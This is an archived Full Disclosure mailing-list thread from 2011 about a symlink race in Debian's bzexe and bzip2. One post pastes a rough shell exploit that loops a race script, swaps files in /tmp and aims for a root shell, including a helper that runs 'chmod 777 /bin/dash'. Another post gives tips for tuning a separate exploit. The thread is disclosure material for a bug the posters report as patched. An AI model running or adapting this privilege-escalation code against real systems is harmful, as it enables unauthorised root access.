Full Disclosure mailing list archives
Re: Symlink vulnerabilities
From: xD 0x41 <secn3t () gmail com>
Date: Mon, 7 Nov 2011 09:33:58 +1100
Nice :) I have put a post about this whole thread on www.crazycoders.com , will add this and props for those involved now :) thx to you, bugs and for others who were involved, also realise that i have now found that bzexe = bzip2 src code, so looking on debian/ubuntu and centos, there is a bzexe or bzip2 on every box,... luckily this issue is patched for both bzip2 and bzexe but know that it is even still being tested now against bunzip2 , on decompressions, but has not been done, only know that the src is same as bzip2 executable binary (linux), again, thx to everyone involved, it got patched within a day wich is what was the aim... Ubuntu is alittle safer ;s cheers. xd On 7 November 2011 03:54, vladz <vladz () devzero fr> wrote:
Hi! It's raining here, so I finally wrote a PoC for the bzexe issue: http://vladz.devzero.fr/other/bzexe_PoC.c.html It always succeed on my Dual-core. Cheers, vladz. On Fri, Oct 28, 2011 at 11:43:56AM +1100, xD 0x41 wrote:I just did a quick write of it , i think this is right anyhow.. i aint the greatest of bash/exploit coders in bash but i did try, and, i kinda had it almost same, but for one line, the while.. i guess that does it, well. here is an example i guess, if we wee to use gcc and make a binary called 'bad' properly.. i assume this would be the way... 8 #!/bin/sh cd /tmp cat > /tmp/bad.c << EOF chmod 777 /bin/dash EOF gcc /tmp/bad.c -o /tmp/bad while (true) do ./bz.sh ; done #!/bin/bash if [ -a /tmp/bash/gztmp* ] then echo "[+] Exploting .." mv /tmp/bash /tmp/bash.dir cp /tmp/bad /tmp/dash echo "[!] Got dash rootshell in: /tmp/dash .." ./dash ls -l /tmp/dash while (true) do ./bz.sh ; done whoami id su fi I think this would be kinda close ? I dont expect this togo onto public domain ATALL, so please, Ill respect your privacy but, you also respect mine ok :) I like you, your a great guy, and, awesome for taking the challenge, where even the striongest, like taviso, and kcope even, left in your wake... and even i am abit shocked but, am going to try and, put it into practice,... the .c bzexe doesnt really do it for me :P but yes, i did change it alittle so it atleast echoes across a tmp bin/sh or, so i think it needs.. then again, it might not need anything, ut, i know these pocs wont get people a rootshell unless we show them, so, i guess aslong as these kinda emails stay pvt, its all good. i have alot fo bugs in the bash area, and i discuss alot with some members of the list even ojn my irc channel on efnet #haxnet , and, there is ALL the exploit coders from FD probably, phrack and more gropups,core,kcope,and rapid7,all them other smaller secteams seem to lurk also, from a 3 user channel about 1 year ago, simply speaking about PoCs made and theyre worth. I guess it is good to see and then to prioritise, as debian have done now, with the bzexe :) See, it would have probably rmained nothing done for god knows, if you had not taken the challenge up, and, i cant believe you did it with a shitty 500mhz! LOL, i am loooking at about 4 of those atm on my floor, i did a tradein offer, p3 for p4 for 50bux, and , i was after that exact celeron and pentium 500mhz p3 cores, theyre very good when played with and, my gears all rack. Anyhow, i would love to chat with you, you use irc >? if so, id love to catchup and have a chat anytime :) If your in Australia, well heck come over for a coffee buddy! have a greeat day, and, if you can fix this to make a rootshell, well, it shuld make it anyhow but, just incase, i guess this is my own collection, and, i have like 6 sh files, wich between them, get all 2011 and earlier, and it is really scary because, there is NO way to expoit them , if using .c ... Anyhow, thankyou, very much, and, i and the secworld owe you a big thanks :) I only wish they credited ppl like me, who try to inpire...lol, i guess i am like one of those dodgy football managers who sleeps with pros and swtuff... hehe... kept in the back... for ther sake of sanity. lol... hjave a good one mate! xd / crazycoders.com ( i will soon make an article and a compete patch solution etc, when it has a patch availabale, ofcourse then PS: i will post it in one big PoC details with solution and patch attached to the posting etc...i dont like to pulish things wich are not atleast being patched.... so, i guess, enjoy! On 28 October 2011 04:34, vladz <vladz () devzero fr> wrote:On Thu, Oct 27, 2011 at 05:01:30PM +0200, Benjamin Renaut wrote:http://pastebin.com/FaaEsXRWNice thing, but for sure, it can be optimized. For example, to save time, I would suggest you to use rename() instead of using both unlink() and rmdir() functions. Same thing for your write_shellcode() function, it contains too much calls. It would be preferable to create your nasty shell script first, and then (when it's time), rename() it as dirname. Cheers, -- http://vladz.devzero.fr PGP key 8F7E2D3C from pgp.mit.edu _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Symlink vulnerabilities xD 0x41 (Nov 06)
- Re: Symlink vulnerabilities Ferenc Kovacs (Nov 06)
